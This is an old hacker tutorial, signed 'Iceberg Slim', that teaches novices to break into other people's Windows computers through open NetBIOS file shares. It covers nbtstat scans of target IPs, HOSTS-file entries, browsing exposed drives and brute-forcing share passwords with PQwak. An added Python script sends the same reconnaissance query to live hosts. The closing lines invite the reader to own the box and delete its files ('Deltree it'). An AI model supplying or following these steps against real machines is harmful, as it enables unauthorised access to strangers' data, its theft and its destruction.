by Iceberg Slim
This tutorial is intended for novice or intermediate computer users looking
to exploit Microsoft file and printer sharing over NetBIOS (Network Basic
Input/Output System). It covers the steps for exploiting NetBIOS from Windows
9x or Windows 2000/XP. To keep the reader's interest, screenshots are shown
for every step, and each step gives the procedure for both Windows 9x and
Windows 2000. You should know basic DOS commands and understand what IP
addresses and file shares are. You will not need any extra tools; everything
used here ships with a default Windows installation.
Steps
1. Check whether the IP or host has NetBIOS enabled
2. Put the IP and the NetBIOS computer name into the HOSTS file
3. Find the computer
4. If the share is password protected, use the tools available to get around the protection
5. 0wn the b0x!
1. Before trying anything with NetBIOS, you must have NetBIOS over TCP/IP and
file sharing enabled on your own machine. Then determine whether the remote
computer has NetBIOS enabled, because unless both ends speak NetBIOS none of
the following will work. Windows ships a utility for exactly this, NBTSTAT.EXE.
In Win9x/ME, it's located in \WINDOWS
In Windows 2000, it's located in \WINNT\system32; in XP, in \WINDOWS\system32
(both are %SystemRoot%\system32)
Nbtstat is a command-line tool. Open a DOS prompt and type "nbtstat", no
quotes, on its own to see its options. To find out whether the remote
computer is reachable over NetBIOS, use:
nbtstat -A ip.address
The capital -A takes an IP address (lowercase -a takes a NetBIOS name). It
sends a NetBIOS node status request to UDP port 137 on the target.
If the command returns "Host not found.", the remote computer either does
not have NetBIOS/file sharing enabled or is not answering; a firewall or
router dropping UDP/137 gives the same result. If the command returns a name
table, the query succeeded and NetBIOS is enabled.
(screenshot: a successful nbtstat -A listing)
The listing may look confusing, but we are only looking for one thing here.
A UNIQUE name with the <20> suffix means the remote computer is running the
Server service, i.e. file and printer sharing is enabled. The other rows are
the Workstation service <00> (the computer name), the workgroup or domain (a
GROUP entry, also <00>), and the Messenger service <03>, which appears once
for the computer name and once for the currently logged-on user, so that row
gives you a username as well. The name in front of <20> is not a share name;
it is the remote computer's NetBIOS computer name, and that is what we need
to reach the machine. The actual share names come later, when you browse the
computer or run "net view \\computername" from the prompt.
2. Now that we have the IP and the NetBIOS name of the computer, we put them
into the HOSTS file. HOSTS is a plain-text table of IP addresses and names
that Windows consults when it resolves a name, before it asks a DNS server;
if the name is found there, Windows does not go searching anywhere else.
Strictly speaking, the file meant for NetBIOS names is LMHOSTS, which lives
in the same directory (a sample, LMHOSTS.SAM, is there on a default install),
but NetBIOS over TCP/IP also falls back to DNS and the HOSTS table when it
cannot resolve a name by broadcast or WINS, so an entry in HOSTS does the job
for our purpose. The HOSTS file has no file extension; it is simply called
"HOSTS".
in 9x/ME, it's located in \WINDOWS
in 2000/XP, it's located in %SystemRoot%\system32\drivers\etc
(\WINNT\system32\drivers\etc on 2000, \WINDOWS\system32\drivers\etc on XP)
On Windows 9x/ME a default installation has only the sample HOSTS.SAM, so
don't freak out if HOSTS itself is not found; you have to make one. Browse
to the directory where it belongs, right-click and go to New > Text Document,
open the new file in Notepad and use File > Save As with the name "HOSTS",
typed with the quotes (or set "Save as type" to All Files), so that Notepad
does not tack a ".txt" extension onto it. The file must be named exactly
HOSTS with no extension; Windows may ask you to confirm that you want a file
with no extension, which is ok and correct. On Windows 2000/XP the file
already exists (it contains a line for 127.0.0.1 localhost), so just open it
in Notepad. Now add a line with the IP first, then a space or a tab, then
the NetBIOS name you found, one entry per line, for example:
192.168.1.50 WORKSTATION1
(made-up values; use the IP and name from your nbtstat output)
(screenshot: the HOSTS file with the new entry)
After the IP and name are in the HOSTS file, click File > Save. Now it's
time to see if we can actually get in.
3. On Win9x/ME systems go to Start > Find > Computer. On Windows 2000 the
same search lives under Start > Search. On XP go to Start > Search > For
Files or Folders, then click the label on the left-hand side called
"Computers or people". Enter the IP of the remote computer (or the name you
put in HOSTS) and search for it; it should show up in the list, and
double-clicking the computer opens its shares. On Windows 2000/XP you can
also skip the search: type \\192.168.1.50 (the target's IP) or \\WORKSTATION1
(the name from HOSTS) into Start > Run, or list the shares from the prompt
with "net view \\WORKSTATION1".
(screenshot: the remote computer found and its shares listed)

If a box pops up and asks for a password, the share is protected by a
share-level password (a Windows 9x/ME feature). A program called PQwak can
brute-force it; it may take time to break the password. On Windows 2000/XP
shares are protected by user accounts instead, so you get asked for a
username and password and a share-password cracker won't help. But mostly
you will not encounter a password box; I personally have only encountered
one on 1 box out of dozens. Now you can browse the shared hard drive or
share freely. Browsing is very slow, partly because of latency and partly
because of a Windows quirk: Explorer's Scheduled Tasks folder extension
checks the remote computer for scheduled tasks every time you open a share
over NetBIOS, which adds seconds to each directory listing. Just let Windows
Explorer pull the information off the remote computer; it may take time, but
it's very easy now to see what's on the remote computer. On Windows 2000 and
Windows NT systems the NTFS permissions of the remote machine still apply
through the share, so certain directories are not accessible: try to open the
Windows directory and you may get a box saying that access is denied due to
administrator restrictions.

(screenshot: the ENTIRE C drive is shared to the Internet!)
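As an added example (this is not code from the original tutorial), here is a Python script that does steps 1 and 2 by hand: it builds the same NetBIOS node status request that nbtstat -A sends to UDP port 137, decodes the reply into the <00>/<03>/<20> table read above, picks out the UNIQUE <20> name (the NetBIOS computer name) and prints the HOSTS line for it. Run it with an IP address to query a live host; run it with no arguments and it decodes a constructed reply embedded in the script. The names WORKSTATION1, WORKGROUP and JSMITH, the MAC address and the IP 192.168.1.50 are all made up for the example.

```python
"""NetBIOS node status (what `nbtstat -A <ip>` does) in plain Python.
Example code added to the tutorial; the sample names, MAC and IP are made up."""
import socket
import struct
import sys

NBSTAT_QTYPE = 0x0021          # NBSTAT resource record type (RFC 1002)
NBNS_PORT = 137
SUFFIXES = {                   # the <xx> column in nbtstat output
    0x00: "Workstation Service (computer name; GROUP = workgroup/domain)",
    0x03: "Messenger Service (computer name or logged-on user)",
    0x20: "File Server Service (file and printer sharing enabled)",
    0x1B: "Domain Master Browser",
    0x1C: "Domain Controllers (GROUP)",
    0x1D: "Master Browser",
    0x1E: "Browser Service Elections (GROUP)",
}


def encode_name(name: bytes, suffix: int, pad: bytes = b" ") -> bytes:
    """RFC 1002 first-level encoding: 15 padded bytes + suffix byte, each byte
    split into two nibbles written as 'A' + nibble, wrapped as one 32-byte label."""
    raw = name[:15].ljust(15, pad) + bytes([suffix])
    half = b"".join(bytes([0x41 + (b >> 4), 0x41 + (b & 0x0F)]) for b in raw)
    return bytes([len(half)]) + half + b"\x00"


def build_node_status_request(trn_id: int = 0x1234) -> bytes:
    """Header (flags 0, one question) + a question for the wildcard name '*'."""
    header = struct.pack(">HHHHHH", trn_id, 0x0000, 1, 0, 0, 0)
    question = encode_name(b"*", 0x00, pad=b"\x00") + struct.pack(">HH", NBSTAT_QTYPE, 1)
    return header + question


def parse_node_status_response(data: bytes) -> dict:
    """Decode the NBSTAT answer into the name table plus the adapter MAC."""
    _, flags, _, ancount, _, _ = struct.unpack_from(">HHHHHH", data, 0)
    if not flags & 0x8000 or ancount < 1:
        raise ValueError("not a NetBIOS response")
    if flags & 0x000F:
        raise ValueError("NBNS error, RCODE %d" % (flags & 0x000F))
    pos = 12
    while data[pos]:                      # skip the answer's encoded name
        if data[pos] & 0xC0 == 0xC0:      # 2-byte compression pointer ends the name
            pos += 1
            break
        pos += 1 + data[pos]
    pos += 1
    rtype, _, _, _ = struct.unpack_from(">HHIH", data, pos)   # TYPE, CLASS, TTL, RDLENGTH
    pos += 10
    if rtype != NBSTAT_QTYPE:
        raise ValueError("unexpected RR type 0x%04x" % rtype)
    num_names, pos = data[pos], pos + 1
    names = []
    for _ in range(num_names):            # 18 bytes per entry: name, suffix, flags
        raw, suffix, nflags = struct.unpack_from(">15sBH", data, pos)
        pos += 18
        names.append({
            "name": raw.rstrip(b" \x00").decode("latin-1"),
            "suffix": suffix,
            "group": bool(nflags & 0x8000),          # G bit: GROUP vs UNIQUE
            "description": SUFFIXES.get(suffix, "unknown"),
        })
    mac = data[pos:pos + 6]                          # UNIT_ID at the start of the statistics
    return {"names": names, "mac": ":".join("%02X" % b for b in mac)}


def file_server_names(result: dict) -> list:
    """UNIQUE names with suffix <20>: the computer name of a host with file sharing on."""
    return [n["name"] for n in result["names"] if n["suffix"] == 0x20 and not n["group"]]


def hosts_entries(ip: str, result: dict) -> str:
    """The line(s) to paste into HOSTS (or LMHOSTS): IP, whitespace, name."""
    return "\n".join("%s\t%s" % (ip, n) for n in file_server_names(result))


def query(ip: str, timeout: float = 2.0) -> dict:
    """Send the request to UDP/137 and decode the reply (needs a live target)."""
    req = build_node_status_request()
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.settimeout(timeout)
    try:
        s.sendto(req, (ip, NBNS_PORT))
        data, _ = s.recvfrom(4096)
    finally:
        s.close()
    if data[:2] != req[:2]:
        raise ValueError("transaction id mismatch")
    return parse_node_status_response(data)


def sample_response(trn_id: int = 0x1234) -> bytes:
    """Constructed reply in the shape a Windows 2000 host returns; all values made up."""
    table = [(b"WORKSTATION1", 0x00, 0x4400), (b"WORKGROUP", 0x00, 0xC400),
             (b"WORKSTATION1", 0x20, 0x4400), (b"WORKSTATION1", 0x03, 0x4400),
             (b"JSMITH", 0x03, 0x4400), (b"WORKGROUP", 0x1E, 0xC400)]
    rdata = bytes([len(table)])
    for name, suffix, nflags in table:
        rdata += struct.pack(">15sBH", name.ljust(15, b" "), suffix, nflags)
    rdata += bytes.fromhex("00AABBCCDDEE") + b"\x00" * 40   # UNIT_ID (MAC) + rest of the 46-byte statistics
    rr = encode_name(b"*", 0x00, pad=b"\x00") + struct.pack(">HHIH", NBSTAT_QTYPE, 1, 0, len(rdata)) + rdata
    return struct.pack(">HHHHHH", trn_id, 0x8400, 0, 1, 0, 0) + rr


if __name__ == "__main__":
    live = len(sys.argv) > 1
    target = sys.argv[1] if live else "192.168.1.50"   # made-up IP for the offline run
    result = query(target) if live else parse_node_status_response(sample_response())
    for n in result["names"]:
        print("%-16s <%02X>  %-6s  %s" % (n["name"], n["suffix"],
                                          "GROUP" if n["group"] else "UNIQUE", n["description"]))
    print("MAC Address =", result["mac"])
    print("HOSTS entry:", hosts_entries(target, result) or "(no <20> name: file sharing is off)")
```

A host answers this query only when NetBIOS over TCP/IP is bound and UDP/137 is reachable, which are exactly the conditions nbtstat -A needs, so a socket timeout here means the same thing as "Host not found." there. The HOSTS line the script prints is the one step 2 has you type by hand.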

So now you have read access to everything the remote machine shares, and
write access too unless the share is read-only; with the whole C drive
shared, that is pretty much the box. Deltree it and see if I care. Peace.
Iceberg Slim does not condone nor endorse malicious intent derived from this
material. User discretion is advised.
Salutations = everyone and anyone @ www.fromadia.com , drew, bakesnake, the
big bad tunafish, squire James (Just cause he propped me in his writing),
sc00by_f00, aj, stroker, ETC ETC, too long to list.
(c) New Order /
http://neworder.box.sk/